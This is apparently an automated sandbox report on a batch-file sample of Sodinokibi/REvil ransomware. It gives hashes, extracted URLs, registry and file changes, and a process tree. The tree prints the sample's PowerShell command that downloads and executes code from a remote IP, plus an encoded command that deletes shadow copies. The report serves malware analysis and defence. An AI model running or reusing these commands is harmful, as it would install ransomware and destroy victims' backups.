Analysis
- max time kernel: 140s
- max time network: 141s
- platform: windows7_x64
- resource: win7v200430
- submitted: 17-05-2020 02:10
Static task: static1
Behavioral task: behavioral1
- Sample: 1f8c25780845b838f9e4e236cecde44a.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: 1f8c25780845b838f9e4e236cecde44a.bat
- Resource: win10v200430
General
- Target: 1f8c25780845b838f9e4e236cecde44a.bat
- Size: 220B
- MD5: aec4b8da44e26c2a159705665e2fd49d
- SHA1: 24ebd61f5b8568a107ee16f17ae0bc3b07887b00
- SHA256: 79aa8d7a7be4115acea3af97412982e19a243d37031ca75779e0d00d68127701
- SHA512: 102759db61f6c214329230c3730e732d62bf5e114d2f712166bb6a811d93d1e7364bd68b3af95a2ab3dc48d225c28910278d2479a601aa676f6875670f634094
Malware Config
- Extracted (download URL): http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a
- Extracted (ransom note): C:\114lvu0rh4-read-me.txt
  - Family: sodinokibi
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1B02B72883D9A3EB
  - http://decryptor.cc/1B02B72883D9A3EB
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  - PID 908 powershell.exe
- Drops file in System32 directory (1 IoC)
  Processes: powershell.exe
  - File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt (powershell.exe)
- Modifies system certificate store
  Processes: powershell.exe
  - Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (blob data omitted) (powershell.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (powershell.exe)
  - Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data omitted) (powershell.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (powershell.exe)
  - Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob data omitted) (powershell.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (powershell.exe)
- Blacklisted process makes network request (153 IoCs)
  Processes: powershell.exe
  - All listed flows originate from PID 908 powershell.exe; flow ids: 1, 5, 7, 9, 11, 13, 14, 16, 17, 19, 20, 22, 24, 26, 28, 30, 32, 34, 35, 37, 39, 40, 42, 44, 45, 47, 49, 51, 52, 54, 55, 57, 58, 60, 61, 63, 64, 66, 68, 70, 71, 73, 75, 77, 78, 80, 82, 84, 86, 88, 90, 92, 93, 95, 96, 98, 100, 101, 103, 104, 106, 107, 109, 111
- Enumerates connected drives (3 TTPs)
- Drops file in Program Files directory (18 IoCs)
  Processes: powershell.exe
  - File created: \??\c:\program files (x86)\114lvu0rh4-read-me.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\AssertWatch.tif (powershell.exe)
  - File opened for modification: \??\c:\program files\DisableTest.midi (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\114lvu0rh4-read-me.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\NewCompress.m4a (powershell.exe)
  - File opened for modification: \??\c:\program files\PublishTrace.mp4v (powershell.exe)
  - File opened for modification: \??\c:\program files\ResumeRename.csv (powershell.exe)
  - File created: \??\c:\program files\114lvu0rh4-read-me.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\GrantSkip.vdw (powershell.exe)
  - File opened for modification: \??\c:\program files\SkipUnprotect.inf (powershell.exe)
  - File opened for modification: \??\c:\program files\TestOptimize.jpe (powershell.exe)
  - File opened for modification: \??\c:\program files\UnprotectFind.tif (powershell.exe)
  - File opened for modification: \??\c:\program files\CheckpointBlock.dxf (powershell.exe)
  - File opened for modification: \??\c:\program files\MoveSave.ADTS (powershell.exe)
  - File opened for modification: \??\c:\program files\OptimizeInitialize.pptx (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\114lvu0rh4-read-me.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\RemoveFormat.3gp (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\114lvu0rh4-read-me.txt (powershell.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9a321y0.bmp" (powershell.exe)
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 1528 cmd.exe wrote to memory of PID 908 powershell.exe
  - PID 908 powershell.exe wrote to memory of PID 1804 powershell.exe (4 entries)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 908 powershell.exe (2 entries)
  - Token: SeDebugPrivilege, PID 1804 powershell.exe
  - Token: SeBackupPrivilege, PID 844 vssvc.exe
  - Token: SeRestorePrivilege, PID 844 vssvc.exe
  - Token: SeAuditPrivilege, PID 844 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 908 powershell.exe
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  - Repeated entries for PID 908 powershell.exe and two entries for PID 1804 powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1528)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\1f8c25780845b838f9e4e236cecde44a.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 908)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a');Invoke-PBOOTODBDYZFW;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Drops file in System32 directory
    - Modifies system certificate store
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1804)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 844)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken